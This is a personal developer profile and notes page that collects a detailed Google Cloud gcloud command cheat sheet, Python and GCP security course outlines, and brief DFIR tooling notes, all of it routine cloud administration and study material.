
cheatsheet's Introduction

Hey! Jymit here.

  • 🤔 It's pronounced Jim-it
  • 💻 In the past I've worked closely on full-stack open source software engineering, notably @ Zimbra and Elastic
  • 🛡️ At present working in SecOps / Security Engineering at scale
  • 🔭 Working on consolidating some years of notes, plus some of the new stuff I'm learning, and some fun, into an organised, tidy space. Trying and failing to drop daily commits in 2022. Missed a bunch due to unplanned circumstances.
  • 🌱 I have an interest in macOS security research
  • 🤔 To that end, I'm always looking for new knowledge on macOS internals and security. Attended OBTSv5 and looking forward to OBTSv6.
  • ⚡ I like to solve problems, and I like to help others solve problems they may have, be it people, software, network, architecture, security...
  • 💬 Ask me Anything
  • 📫 How to reach me 🤔. Where can you find me first?

Currently Research Learning

macOS Security Research

CVEs

WIP - hopefully soon!?

Technical Writeups in progress

WIP time permitting - hoping to draft a couple in the next 9-12 months on Medium. Current ideas are for non-technical pieces: social anxiety and working in tech, leadership styles, and empathy as a leader.

Something about nothing

  • Life Long Learning (a must)
  • There cannot be any learning without teaching or mentoring (reach out to talk about tech and cyber). Hoping to start doing even more of both in 2023-24, stay tuned.
  • Some SANS, some GIACs (who doesn't nowadays)
  • Along with some experience in different tech spaces

To improve the below as time goes on

To Do list (areas I have read or am reading about, and/or want to pursue or implement in some shape or form)

  • macOS internals / malware / writing and learning my own escapes
  • Working out time complexity, because being able to think and work like a SWE is never a bad idea

Recent reading, recommendations

  • Apple Endpoint Security Framework ESF - Talk from BSides Munich by Connor Morley
  • Sec updates from AWS - filter by security tool of choice - eg. AWS Security Hub launches 7 new security controls


cheatsheet's Issues

Google Crash Course on Python

wk1
Navigate the Coursera platform and find resources for help
Define what a programming language is and what syntax means
Define what a script is and how it applies to automation
List some of the benefits of the Python programming language
Utilize basic functions and keywords to display data and perform arithmetic operations

wk2
Differentiate and convert between different data types utilizing variables
Define and call functions utilizing parameters and return data
Refactor code and write comments to reduce complexity and enhance code readability and code reuse
Compare values using equality operators and logical operators
Build complex branching scripts utilizing if, else and elif statements

wk3
Implement while loops to continuously execute code
Identify and fix infinite loops when using while loops
Utilize for loops to iterate over sets of data
Use the range() function to control for loops
Identify and correct common errors when using loops

wk4
Manipulate strings using indexing, slicing, and formatting
Use lists and tuples to store, reference, and manipulate data
Leverage dictionaries to store more complex data, reference data by keys, and manipulate data stored
Combine these data types to construct complex data structures

wk5
Demonstrate object-oriented programming using classes and objects
Implement classes with custom attributes and methods
Write docstrings to document classes and methods
Leverage inheritance to reduce code duplication
Import and use Python modules to access powerful classes and methods

wk6
Tackle more complex problems from the ground up using a framework
Formulate a problem statement to understand the inputs and outputs of a script
Conduct research into options for tackling the problem
Plan an approach to solving the problem
Write a complex script in order to implement a solution

pydevops/gcloud_cheat_sheet.md

Table of Contents

0.1. References

0.2. Other cheatsheets

0.3. Manage multiple gcloud config configurations

gcloud config configurations create pythonrocks
gcloud config configurations list
gcloud config configurations activate pythonrocks
gcloud config set core/account [email protected]
gcloud projects list
gcloud config set project mygcp-demo

0.3.1. Switch gcloud context with gcloud config

gcloud config list
gcloud config set account [email protected] 
gcloud config set project mygcp-demo
gcloud config set compute/region us-west1
gcloud config set compute/zone us-west1-a
alias demo='gcloud config set account [email protected] && gcloud config set project mygcp-demo && gcloud config set compute/region us-west1 && gcloud config set compute/zone us-west1-a'

cluster=$(gcloud config get-value container/cluster 2> /dev/null)
zone=$(gcloud config get-value compute/zone 2> /dev/null)
project=$(gcloud config get-value core/project 2> /dev/null)

#switch project based on the name
gcloud config set project $(gcloud projects list --filter='name:wordpress-dev' --format='value(project_id)')

command -v gcloud >/dev/null 2>&1 || { \
 echo >&2 "I require gcloud but it's not installed.  Aborting."; exit 1; }

REGION=$(gcloud config get-value compute/region)
if [[ -z "${REGION}" ]]; then
    echo "https://cloud.google.com/compute/docs/regions-zones/changing-default-zone-region" 1>&2
    echo "gcloud cli must be configured with a default region." 1>&2
    echo "run 'gcloud config set compute/region REGION'." 1>&2
    echo "replace 'REGION' with the region name like us-west1." 1>&2
    exit 1;
fi

0.4. Auth

gcloud auth list
# to authenticate with a user identity (via web flow), which then authorizes gcloud and other SDK tools to access Google Cloud Platform
gcloud auth login
# to set up Application Default Credentials with a user identity (via web flow), for code and tools that read ADC
gcloud auth application-default login
gcloud auth activate-service-account --key-file=sa_key.json
# use GOOGLE_APPLICATION_CREDENTIALS pointing to JSON key

kubectl uses an OAuth token generated by:

  • gcloud config config-helper --format json
  • gcloud config config-helper --format='value(credential.access_token)'
  • gcloud auth print-access-token (generates a new token)
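That token can also be handed to the Kubernetes API by hand. A minimal sketch, assuming a reachable cluster endpoint; the `auth_header` helper and the commented names are illustrative, not from the original notes:

```shell
# Build a bearer-token header from whatever token gcloud hands back.
auth_header() { printf 'Authorization: Bearer %s' "$1"; }

# Real usage (placeholder names; requires gcloud and a cluster):
#   TOKEN=$(gcloud auth print-access-token)
#   ENDPOINT=$(gcloud container clusters describe mycluster --format='get(endpoint)')
#   curl -sk -H "$(auth_header "$TOKEN")" "https://${ENDPOINT}/version"

auth_header EXAMPLE_TOKEN   # prints: Authorization: Bearer EXAMPLE_TOKEN
```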

0.5. info

gcloud info --format flattened
export PROJECT=$(gcloud info --format='value(config.project)')

0.6. projects

# various ways to get project_id
PROJECT_ID=$(gcloud config get-value core/project 2>/dev/null)
PROJECT_ID=$(gcloud config list project --format='value(core.project)')
PROJECT_ID=$(gcloud info --format='value(config.project)')

# get project_number given project_id or name
gcloud projects list --filter="project_id:${PROJECT_ID}"  --format='value(project_number)'
gcloud projects list --filter="name:${project_name}"  --format='value(project_number)'

0.7. zones & regions

To return a list of zones given a region

gcloud compute zones list --filter=region:us-central1
# list regions
gcloud compute regions list

0.8. organization

ORG_ID=$(gcloud organizations list --format 'value(ID)')
# list top level folders
gcloud resource-manager folders list --organization=$ORG_ID
# list sub folders given upper level folder id
gcloud resource-manager folders list --folder=$FOLDER_ID
# get iam policy for the folder
gcloud resource-manager folders get-iam-policy $FOLDER_ID

# grant roles to a user
ORGANIZATION_ADMIN_ADDRESS='user:[email protected]'
gcloud resource-manager folders add-iam-policy-binding ${folder_id} \
  --member=${ORGANIZATION_ADMIN_ADDRESS} \
  --role=roles/resourcemanager.folderAdmin
gcloud resource-manager folders add-iam-policy-binding ${folder_id} \
  --member=${ORGANIZATION_ADMIN_ADDRESS} \
  --role=roles/storage.admin
gcloud resource-manager folders add-iam-policy-binding ${folder_id} \
  --member=${ORGANIZATION_ADMIN_ADDRESS} \
  --role=roles/billing.projectManager

0.9. billing

gcloud organizations list
gcloud beta billing accounts list
# link a billing account with a project, assuming the user or service account has "Billing Account User" role. 
gcloud beta billing projects link ${project_id} \
            --billing-account ${ORGANIZATION_BILLING_ACCOUNT}

0.10. iam

gcloud iam roles describe roles/container.admin

gcloud iam list-testable-permissions <uri>
e.g. gcloud iam list-testable-permissions //cloudresourcemanager.googleapis.com/projects/$PROJECT_ID

gcloud iam list-grantable-roles <uri>
e.g. 
gcloud iam list-grantable-roles //cloudresourcemanager.googleapis.com/projects/$PROJECT_ID
gcloud iam list-grantable-roles https://www.googleapis.com/compute/v1/projects/$PROJECT_ID/zones/us-central1-a/instances/iowa1

# get uri e.g.
gcloud projects list --uri

0.11. service account

0.11.1. as an identity

export SA_EMAIL=$(gcloud iam service-accounts list \
    --filter="displayName:jenkins" --format='value(email)')
export PROJECT=$(gcloud info --format='value(config.project)')

# create and list service accounts
gcloud iam service-accounts create jenkins --display-name jenkins
gcloud iam service-accounts list
gcloud iam service-accounts list   --filter='email ~ [0-9]*-compute@.*'   --format='table(email)'

# create & list sa key  
gcloud iam service-accounts keys create jenkins-sa.json --iam-account $SA_EMAIL    
gcloud iam service-accounts keys list --iam-account=vault-admin@<project_id>.iam.gserviceaccount.com


 gcloud projects get-iam-policy ${PROJECT} --flatten="bindings[].members" --filter="bindings.members:serviceAccount:terraform@${PROJECT_ID}.iam.gserviceaccount.com"
 
gcloud projects add-iam-policy-binding $PROJECT  --role roles/storage.admin \
    --member serviceAccount:$SA_EMAIL
gcloud projects add-iam-policy-binding $PROJECT --role roles/compute.instanceAdmin.v1 \
    --member serviceAccount:$SA_EMAIL
gcloud projects add-iam-policy-binding $PROJECT --role roles/compute.networkAdmin \
    --member serviceAccount:$SA_EMAIL
gcloud projects add-iam-policy-binding $PROJECT --role roles/compute.securityAdmin \
    --member serviceAccount:$SA_EMAIL
gcloud projects add-iam-policy-binding $PROJECT --role roles/iam.serviceAccountActor \
    --member serviceAccount:$SA_EMAIL

0.11.2. service account as a resource

gcloud iam service-accounts get-iam-policy <sa_email>, eg. 
gcloud iam service-accounts get-iam-policy secret-accessor-dev@$PROJECT_ID.iam.gserviceaccount.com --project $PROJECT_ID
bindings:
- members:
  - serviceAccount:<project-id>.svc.id.goog[default/secret-accessor-dev]
  role: roles/iam.workloadIdentityUser
etag: BwWhFqqv9aQ=
version: 1

gcloud iam service-accounts add-iam-policy-binding [email protected] --member='serviceAccount:[email protected]' --role='roles/iam.serviceAccountActor'
# user:[email protected] impersonates the service account terraform@${PROJECT_ID}.iam.gserviceaccount.com
gcloud iam service-accounts add-iam-policy-binding  terraform@${PROJECT_ID}.iam.gserviceaccount.com --member=user:[email protected] --role roles/iam.serviceAccountTokenCreator
gcloud container clusters list --impersonate-service-account=terraform@${PROJECT_ID}.iam.gserviceaccount.com

0.11.3. GCS bucket level

gsutil iam get gs://${BUCKET_NAME}  -p ${PROJECT_ID}
COMPUTE_ENGINE_SA_EMAIL=$(gcloud iam service-accounts list --filter="name:Compute Engine default service account" --format "value(email)")
gsutil iam ch serviceAccount:${COMPUTE_ENGINE_SA_EMAIL}:objectViewer gs://${BUCKET_NAME}

0.11.4. Custom Roles

# list predefined roles
gcloud iam roles list
# list custom roles
gcloud iam roles list --project $PROJECT_ID

# create a custom role in one of two ways: at project level (--project [PROJECT_ID]) or at org level (--organization [ORGANIZATION_ID])
1. gcloud iam roles create editor --project $PROJECT_ID --file role-definition.yaml
2. gcloud iam roles create viewer --project $PROJECT_ID --title "Role Viewer" --description "Custom role description." --permissions compute.instances.get,compute.instances.list --stage ALPHA
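For reference, a minimal sketch of what the role-definition.yaml passed to `--file` might contain; the title and permission list here are illustrative:

```shell
# Write an illustrative role definition; field names follow the gcloud
# custom-role YAML schema (title, description, stage, includedPermissions).
cat > role-definition.yaml << 'EOF'
title: "Role Viewer"
description: "Custom role description."
stage: "ALPHA"
includedPermissions:
- compute.instances.get
- compute.instances.list
EOF

grep -c '^- compute.instances' role-definition.yaml   # two permission entries
```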

0.12. App engine

0.13. Cloud build

# user defined
gcloud builds submit --config=cloudbuild.yaml --substitutions=_BRANCH_NAME=foo,_BUILD_NUMBER=1 .

# override built in TAG_NAME
gcloud builds submit --config=cloudbuild.yaml --substitutions=TAG_NAME=v1.0.1

0.13.1. Cloud build trigger GCE rolling replace/start

steps:
- name: 'gcr.io/cloud-builders/docker'
  args: [ 'build', '-t', 'gcr.io/$PROJECT_ID/gcp-cloudbuild-gce-angular', '.' ]
- name: 'gcr.io/cloud-builders/gcloud'
  args: [ 'beta', 'compute', 'instance-groups', 'managed', 'rolling-action', 'restart', 'gce-angular-instance-group', '--zone=us-east1-b' ]
images:
- 'gcr.io/$PROJECT_ID/gcp-cloudbuild-gce-angular'

0.14. KMS

# list all keyrings 
gcloud kms keyrings list --location global
# list all keys in my_key_ring
gcloud kms keys list --keyring my_key_ring --location global

# grant KMS IAM permissions to user $USER_EMAIL
gcloud kms keyrings add-iam-policy-binding $KEYRING_NAME \
    --location global \
    --member user:$USER_EMAIL \
    --role roles/cloudkms.admin
gcloud kms keyrings add-iam-policy-binding $KEYRING_NAME \
    --location global \
    --member user:$USER_EMAIL \
    --role roles/cloudkms.cryptoKeyEncrypterDecrypter
    
# Encrypt and Decrypt in REST API
curl -v "https://cloudkms.googleapis.com/v1/projects/$DEVSHELL_PROJECT_ID/locations/global/keyRings/$KEYRING_NAME/cryptoKeys/$CRYPTOKEY_NAME:encrypt" \
  -d "{\"plaintext\":\"$PLAINTEXT\"}" \
  -H "Authorization:Bearer $(gcloud auth application-default print-access-token)"\
  -H "Content-Type:application/json" \
| jq .ciphertext -r > 1.encrypted

curl -v "https://cloudkms.googleapis.com/v1/projects/$DEVSHELL_PROJECT_ID/locations/global/keyRings/$KEYRING_NAME/cryptoKeys/$CRYPTOKEY_NAME:decrypt" \
  -d "{\"ciphertext\":\"$(cat 1.encrypted)\"}" \
  -H "Authorization:Bearer $(gcloud auth application-default print-access-token)"\
  -H "Content-Type:application/json" \
| jq .plaintext -r | base64 -d    
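One gotcha with the REST calls above: the :encrypt endpoint expects the "plaintext" JSON field to be base64-encoded, so $PLAINTEXT should be prepared along these lines (a sketch; the sample string is arbitrary):

```shell
# KMS's :encrypt expects base64 in the "plaintext" JSON field;
# :decrypt returns base64 in "plaintext", hence the `base64 -d` above.
PLAINTEXT=$(printf 'some sensitive text' | base64)
echo "$PLAINTEXT"                      # safe to embed in the JSON body
printf '%s' "$PLAINTEXT" | base64 -d   # round-trips to the original
```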

0.15. Secret Manager

# create a secret
gcloud secrets create SECRET_NAME --replication-policy="automatic"
# create a secret version
gcloud secrets versions add "SECRET_NAME" --data-file="/path/to/file.txt"
# list
gcloud secrets list
# read
gcloud secrets versions access latest --secret=my_ssh_private_key
# update the labels (metadata) of a secret
gcloud secrets update SECRET_NAME --update-labels=KEY=VALUE

0.16. Compute Engine

0.16.1. gcloud command for creating an instance

As generated from the web console:

gcloud compute instances create [INSTANCE_NAME] \
  --image-family [IMAGE_FAMILY] \
  --image-project [IMAGE_PROJECT] \
  --create-disk image=[DISK_IMAGE],image-project=[DISK_IMAGE_PROJECT],size=[SIZE_GB],type=[DISK_TYPE]
  
gcloud compute instances create micro1 --zone=us-west1-a --machine-type=f1-micro --subnet=default --network-tier=PREMIUM --maintenance-policy=MIGRATE --service-account=398028291895-compute@developer.gserviceaccount.com --scopes=https://www.googleapis.com/auth/devstorage.read_only,https://www.googleapis.com/auth/logging.write,https://www.googleapis.com/auth/monitoring.write,https://www.googleapis.com/auth/servicecontrol,https://www.googleapis.com/auth/service.management.readonly,https://www.googleapis.com/auth/trace.append --min-cpu-platform=Automatic --image=debian-9-stretch-v20180510 --image-project=debian-cloud --boot-disk-size=10GB --boot-disk-type=pd-standard --boot-disk-device-name=micro1

0.16.2. list compute images

gcloud compute images list --filter=name:debian --uri
https://www.googleapis.com/compute/v1/projects/debian-cloud/global/images/debian-8-jessie-v20180109
https://www.googleapis.com/compute/v1/projects/debian-cloud/global/images/debian-9-stretch-v20180105

# Use the following command to see available non-Shielded VM Windows Server images
gcloud compute images list --project windows-cloud --no-standard-images
# Use the following command to see a list of available Shielded VM images, including Windows images
gcloud compute images list --project gce-uefi-images --no-standard-images

0.16.3. list an instance

gcloud compute instances list --filter="zone:us-central1-a"
gcloud compute instances list --project=dev --filter="name~^es"
gcloud compute instances list --project=dev --filter=name:kafka --format="value(name,INTERNAL_IP)"
gcloud compute instances list --filter=tags:kafka-node
gcloud compute instances list --filter='machineType:g1-small'

0.16.4. move instance

gcloud compute instances move <instance_wanna_move> --destination-zone=us-central1-a --zone=us-central1-c

0.16.5. ssh & scp

# --verbosity=debug is great for debugging, showing the underlying SSH command
# the following is a real-world example: a bastion server that talks to a GKE cluster (master authorized network)
gcloud compute ssh --verbosity=debug <instance_name> --command "kubectl get nodes"

gcloud compute scp  --recurse ../manifest <instance_name>:

0.16.6. SSH via IAP

# find the access config's name
gcloud compute instances describe oregon1
# remove the external IP
gcloud compute instances delete-access-config oregon1 --access-config-name "External NAT"
# connect via IAP, assuming the IAP role is granted to the account used for login
gcloud beta compute ssh oregon1 --tunnel-through-iap

0.16.7. ssh port forwarding for elasticsearch

gcloud compute --project "foo" ssh --zone "us-central1-c" "elasticsearch-1"  --ssh-flag="-L localhost:9200:localhost:9200"

The second localhost is relative to elasticsearch-1, so the remote Elasticsearch answers on your local port 9200.

0.16.8. ssh reverse port forwarding

for example, how to connect to home server's flask server (tcp port 5000) for a demo or a local game server in development

GOOGLE_CLOUD_PROJECT=$(gcloud config get-value project)
gcloud compute --project "${GOOGLE_CLOUD_PROJECT}" ssh --zone "us-west1-c" --ssh-flag="-v -N -R :5000:localhost:5000" "google_cloud_bastion_server"

0.16.9. generate ssh config

gcloud compute config-ssh

0.16.10. Windows RDP reset windows password

returns the IP and password for creating the RDP connection.

gcloud compute reset-windows-password instance --user=jdoe

ip_address: 104.199.119.166
password:   Ks(;_gx7Bf2d.NP
username:   jdoe

0.16.11. debugging

0.16.12. instance level metadata

curl -s "http://metadata.google.internal/computeMetadata/v1/instance/?recursive=true&alt=text" -H "Metadata-Flavor: Google"
leader=$(curl -s "http://metadata.google.internal/computeMetadata/v1/instance/attributes/leader" -H "Metadata-Flavor: Google")

0.16.13. project level metadata

gcloud compute project-info describe
gcloud compute project-info describe --flatten="commonInstanceMetadata[]"

0.16.14. instances, template, target-pool and instance group

cat << EOF > startup.sh
#! /bin/bash
apt-get update
apt-get install -y nginx
service nginx start
sed -i -- 's/nginx/Google Cloud Platform - '"\$HOSTNAME"'/' /var/www/html/index.nginx-debian.html
EOF

gcloud compute instance-templates create nginx-template  --metadata-from-file startup-script=startup.sh
gcloud compute target-pools create nginx-pool
gcloud compute instance-groups managed create nginx-group \
         --base-instance-name nginx \
         --size 2 \
         --template nginx-template \
         --target-pool nginx-pool

0.16.15. MIG with startup and shutdown scripts

https://cloud.google.com/vpc/docs/special-configurations#multiple-natgateways

gsutil cp gs://nat-gw-template/startup.sh .

gcloud compute instance-templates create nat-1 \
    --machine-type n1-standard-2 --can-ip-forward --tags natgw \
    --metadata-from-file=startup-script=startup.sh --address $nat_1_ip

gcloud compute instance-templates create nat-2 \
    --machine-type n1-standard-2 --can-ip-forward --tags natgw \
    --metadata-from-file=startup-script=startup.sh  --address $nat_2_ip

0.16.16. disk snapshot

gcloud compute disks snapshot kafka-data1-1 --async --snapshot-names=kafka-data-1 --project project_a --zone us-west1-a
Use [gcloud compute operations describe URI] command to check the status of the operation(s).

0.16.17. regional disk

 gcloud beta compute instances attach-disk micro1 --disk pd-west1 --disk-scope regional

0.17. Networking

0.17.1. network and subnets

 gcloud compute networks create privatenet --subnet-mode=custom
 gcloud compute networks subnets create privatesubnet-us --network=privatenet --region=us-central1 --range=172.16.0.0/24
 gcloud compute networks subnets create privatesubnet-eu --network=privatenet --region=europe-west1 --range=172.20.0.0/20
 gcloud compute networks subnets list --sort-by=NETWORK

0.17.2. route

tag the instances with no-ips

gcloud compute instances add-tags existing-instance --tags no-ip
gcloud compute routes create no-ip-internet-route \
    --network custom-network1 \
    --destination-range 0.0.0.0/0 \
    --next-hop-instance nat-gateway \
    --next-hop-instance-zone us-central1-a \
    --tags no-ip --priority 800

0.17.3. firewall rules

# allow SSH, RDP and ICMP for the given network
gcloud compute firewall-rules create managementnet-allow-icmp-ssh-rdp --direction=INGRESS --priority=1000 --network=managementnet --action=ALLOW --rules=tcp:22,3389,icmp --source-ranges=0.0.0.0/0
# allow internal from given source range
gcloud compute firewall-rules create mynetwork-allow-internal --network \
mynetwork --action ALLOW --direction INGRESS --rules all \
--source-ranges 10.128.0.0/9
gcloud compute firewall-rules list --filter="network:mynetwork"

## DENY
gcloud compute firewall-rules create mynetwork-deny-icmp \
--network mynetwork --action DENY --direction EGRESS --rules icmp \
--destination-ranges 10.132.0.2 --priority 500
gcloud compute firewall-rules list \
--filter="network:mynetwork AND name=mynetwork-deny-icmp"

# sort-by
gcloud compute firewall-rules list --sort-by=NETWORK

0.17.4. layer 4 network lb

gcloud compute firewall-rules create www-firewall --allow tcp:80
gcloud compute forwarding-rules create nginx-lb \
         --region us-central1 \
         --ports=80 \
         --target-pool nginx-pool
         
gcloud compute firewall-rules list --sort-by=NETWORK

0.17.5. layer 7 http lb

gcloud compute http-health-checks create http-basic-check
gcloud compute instance-groups managed \
       set-named-ports nginx-group \
       --named-ports http:80

gcloud compute backend-services create nginx-backend \
      --protocol HTTP --http-health-checks http-basic-check --global
      
gcloud compute backend-services add-backend nginx-backend \
    --instance-group nginx-group \
    --instance-group-zone us-central1-a \
    --global  

gcloud compute url-maps create web-map \
    --default-service nginx-backend

gcloud compute target-http-proxies create http-lb-proxy \
    --url-map web-map
    
gcloud compute forwarding-rules create http-content-rule \
        --global \
        --target-http-proxy http-lb-proxy \
        --ports 80
gcloud compute forwarding-rules list

0.17.6. forwarding-rules

gcloud compute forwarding-rules list --filter=$(dig +short <dns_name>)
gcloud compute forwarding-rules describe my-forwardingrule --region us-central1
gcloud compute forwarding-rules describe my-http-forwardingrule --global

0.17.7. address

# get the external IP address of the instance
gcloud compute instances describe single-node \
     --format='value(networkInterfaces[0].accessConfigs[0].natIP)'
     
gcloud compute addresses describe https-lb --global --format json

# list all IP addresses
gcloud projects list --format='value(project_id)' | xargs -I {} gcloud compute addresses list --format='value(address)' --project {}  2>/dev/null | sort | uniq -c

0.18. interconnect

# list Google Compute Engine interconnect locations
gcloud compute interconnects locations list

0.19. GCP managed ssl certificate

gcloud beta compute ssl-certificates create example-mydomain --domains example.mydomain.com
gcloud beta compute ssl-certificates list
gcloud beta compute ssl-certificates describe example-mydomain
# It takes 30+ minutes to provision the TLS cert; one of the conditions is that a target-https-proxies resource needs to be associated with the cert.
gcloud beta compute target-https-proxies list

0.20. StackDriver logging

gcloud logging read "timestamp >= \"2018-04-19T00:30:00Z\"  and logName=projects/${project_id}/logs/requests and resource.type=http_load_balancer" --format="csv(httpRequest.remoteIp,httpRequest.requestUrl,timestamp)" --project=${project_id}

0.21. Service

0.21.1. list service available

gcloud services list --available

0.21.2. Enable Service

# chain (one invocation enables several services)
gcloud services enable cloudapis.googleapis.com \
  cloudresourcemanager.googleapis.com \
  compute.googleapis.com

# or one at a time
gcloud services enable container.googleapis.com
gcloud services enable containerregistry.googleapis.com
gcloud services enable cloudbuild.googleapis.com
gcloud services enable iam.googleapis.com
gcloud services enable logging.googleapis.com
gcloud services enable monitoring.googleapis.com
gcloud services enable storage-api.googleapis.com
gcloud services enable storage-component.googleapis.com
gcloud services enable sourcerepo.googleapis.com
function enable-service() {
  SERVICE=$1
  if [[ $(gcloud services list --format="value(serviceConfig.name)" \
                                --filter="serviceConfig.name:$SERVICE" 2>&1) != \
                                "$SERVICE" ]]; then
    echo "Enabling $SERVICE"
    gcloud services enable $SERVICE
  else
    echo "$SERVICE is already enabled"
  fi
}

enable-service container.googleapis.com

0.22. Client libraries you can use to connect to Google APIs

0.23. chaining gcloud commands

gcloud compute forwarding-rules list --format 'value(NAME)' \
| xargs -I {}  gcloud compute forwarding-rules delete {}  --region us-west1 -q

gcloud projects list --format='value(project_id)' \
| xargs -I {} gcloud compute addresses list --format='value(address)' --project {}  2>/dev/null | sort | uniq -c

gcloud compute instances list --filter=elasticsearch --format='value(NAME)' \
| xargs -I {} -p gcloud compute instances stop {}
gcloud compute instances list --filter=elasticsearch --format='value(INTERNAL_IP)' \
| xargs -I {} ssh {} "sudo chef-client"

# delete non default routes
gcloud compute routes list --filter="NOT network=default" --format='value(NAME)' \
| xargs -I {} gcloud compute routes delete -q {}

0.24. one liner to purge GCR images given a date

DATE=2018-10-01
IMAGE=<project_id>/<image_name>
gcloud container images list-tags gcr.io/$IMAGE --limit=unlimited --sort-by=TIMESTAMP   \
--filter="NOT tags:* AND timestamp.datetime < '${DATE}'" --format='get(digest)' | \
while read digest;do gcloud container images delete -q --force-delete-tags gcr.io/$IMAGE@$digest ;done

0.25. GKE

# create a private cluster
gcloud beta container clusters create private-cluster \
    --private-cluster \
    --master-ipv4-cidr 172.16.0.16/28 \
    --enable-ip-alias \
    --create-subnetwork ""


gcloud compute networks subnets create my-subnet \
    --network default \
    --range 10.0.4.0/22 \
    --enable-private-ip-google-access \
    --region us-central1 \
    --secondary-range my-svc-range=10.0.32.0/20,my-pod-range=10.4.0.0/14

gcloud beta container clusters create private-cluster2 \
    --private-cluster \
    --enable-ip-alias \
    --master-ipv4-cidr 172.16.0.32/28 \
    --subnetwork my-subnet \
    --services-secondary-range-name my-svc-range \
    --cluster-secondary-range-name my-pod-range
 
 gcloud container clusters update private-cluster2 \
    --enable-master-authorized-networks \
    --master-authorized-networks <external_ip_of_kubectl_instance>
# create a GKE cluster with CloudRun,Istio, HPA enabled
gcloud beta container clusters create run-gke \
  --addons HorizontalPodAutoscaling,HttpLoadBalancing,Istio,CloudRun \
  --scopes cloud-platform \
  --zone us-central1-a \
  --machine-type n1-standard-4 \
  --enable-stackdriver-kubernetes \
  --no-enable-ip-alias
# create a VPC native cluster
gcloud container clusters create k1 \
--network custom-ip-vpc --subnetwork subnet-alias \
--enable-ip-alias --cluster-ipv4-cidr=/16   --services-ipv4-cidr=/22
# get the GKE endpoint
gcloud container clusters describe mycluster --format='get(endpoint)'
# generate a ~/.kube/config for private cluster with private endpoint
gcloud container clusters get-credentials private-cluster --zone us-central1-a --internal-ip

0.25.1. create a GKE cluster with label and query it later

gcloud container clusters create example-cluster --labels env=dev
gcloud container clusters list --filter resourceLabels.env=dev 

0.26. Cloud Run

# deploy a service on Cloud Run in us-central1 and allow unauthenticated user
gcloud beta run deploy --image gcr.io/${PROJECT_ID}/helloworld --platform managed --region us-central1 --allow-unauthenticated

# list services
gcloud beta run services list
# get endpoint url for a service
gcloud beta run services describe <service_name> --format="get(status.url)"

0.27. Machine Learning

brew install bat
gcloud ml language analyze-entities --content="Michelangelo Caravaggio, Italian painter, is known for 'The Calling of Saint Matthew'." | bat  -l json

0.28. Deployment Manager

GOOGLE FOSS DFIR

https://github.com/google/timesketch
https://github.com/google/timesketch/blob/master/docs/Installation.md
Ubuntu 18.04LTS Server edition

https://github.com/google/timesketch/blob/master/docs/EnablePlasoUpload.md

4 GB Memory / 80 GB Disk / SFO2 - Ubuntu 18.04.3 (LTS) x64
Works fine; install fail2ban too.
* Can easily install Plaso (Log2Timeline) and Redis on this node (for HTTP uploads), which I did.

* Be aware that the CSV generated may be unreasonably large. If this happens you will need to use the slice option within psort to narrow down your date/time range. See the man page for psort.py for usage info.

pydevops/dump_networks.sh

#!/usr/bin/env bash
set -o errexit
set -o nounset
set -o pipefail

# For one project only
# Please make sure to run `gcloud config set project <project_id>` first

command -v gcloud >/dev/null 2>&1 || \
  { echo >&2 "I require gcloud but it's not installed. Aborting.";exit 1; }

PROJECT_ID=$(gcloud config list project --format 'value(core.project)')
if [ -z "${PROJECT_ID}" ]
  then echo >&2 "I require default project is set but it's not. Aborting."; exit 1;
fi

OUT=$PROJECT_ID.txt
cat /dev/null > $OUT
echo "**networks**" >> $OUT
gcloud compute networks list >> $OUT
echo "**subnets**" >> $OUT
gcloud compute networks subnets list --sort-by=NETWORK >> $OUT
echo "**routes**" >> $OUT
gcloud compute routes list --sort-by=NETWORK  >> $OUT
echo "**firewall-rules**" >> $OUT
gcloud compute firewall-rules list --sort-by=NETWORK >> $OUT

echo "##Please send the content of $OUT to us, thanks!##"

Security in Google Cloud Platform

=>
=> Security in Google Cloud Platform Specialization
=>

=> 1 Google Cloud Platform Fundamentals: Core Infrastructure
- GCP, GCE, GCS, GKE, GAE, BQ, ML
=> 2 Managing Security in Google Cloud Platform
- Cloud ID, IAM, VPC sec
=> 3 Security Best Practices in Google Cloud
- Service accounts, IAM roles, GCE best practices
=> 4 Mitigating Security Vulnerabilities on Google Cloud Platform
Protecting against Distributed Denial of Service Attacks
- Cloud Armor (App, DDOS defense)
- DLP API
- Security Command Center
- Stackdriver Monitoring and Logging
- Forseti


Cannot remember where this syllabus is from! Edit: believed to be found here: https://www.jellyfish.com/en-gb/training/courses/security-in-google-cloud-platform- which is not the one I want. To do: add the correct syllabus above this paragraph, above the dashes.

Module 1: Foundations of GCP Security
Google Cloud's approach to security
The shared security responsibility model
Threats mitigated by Google and by GCP
Access Transparency

Module 2: Cloud Identity
Cloud Identity
Syncing with Microsoft Active Directory
Choosing between Google authentication and SAML-based SSO
GCP best practices

Module 3: Identity and Access Management
GCP Resource Manager: projects, folders, and organizations
GCP IAM roles, including custom roles
GCP IAM policies, including organization policies
GCP IAM best practices
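Module 3's roles and bindings map onto two gcloud verbs; a hedged sketch, with project, member, role, and permission names that are placeholders of my own:

```shell
# Grant a predefined role at project scope (hypothetical project/user)
gcloud projects add-iam-policy-binding my-project \
    --member="user:alice@example.com" \
    --role="roles/logging.viewer"

# Define a custom role from a minimal permission set
gcloud iam roles create myAuditor --project my-project \
    --permissions logging.logEntries.list --stage GA
```

Best practice from the module: prefer predefined roles, and keep custom roles for the cases they don't cover.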

Module 4: Configuring Google Virtual Private Cloud for Isolation and Security
Configuring VPC firewalls (both ingress and egress rules)
Load balancing and SSL policies
Private Google API access
SSL proxy use
Best practices for structuring VPC networks
Best security practices for VPNs
Security considerations for interconnect and peering options
Available security products from partners
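Module 4's ingress/egress firewall rules look like this in gcloud form (network and rule names are placeholders; 35.235.240.0/20 is Google's IAP source range):

```shell
# Ingress: allow SSH only from Identity-Aware Proxy
gcloud compute firewall-rules create allow-iap-ssh \
    --network my-vpc --direction INGRESS --action ALLOW \
    --rules tcp:22 --source-ranges 35.235.240.0/20

# Egress: default-deny everything at low priority
gcloud compute firewall-rules create deny-all-egress \
    --network my-vpc --direction EGRESS --action DENY \
    --rules all --destination-ranges 0.0.0.0/0 --priority 65534
```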

Module 5: Monitoring, Logging, Auditing, and Scanning
Stackdriver monitoring and logging
VPC flow logs
Cloud audit logging
Deploying and Using Forseti

Module 6: Securing Compute Engine: techniques and best practices
Compute Engine service accounts, default and customer-defined
IAM roles for VMs
API scopes for VMs
Managing SSH keys for Linux VMs
Managing RDP logins for Windows VMs
Organization policy controls: trusted images, public IP address, disabling serial port
Encrypting VM images with customer-managed encryption keys and with customer-supplied encryption keys
Finding and remediating public access to VMs
VM best practices
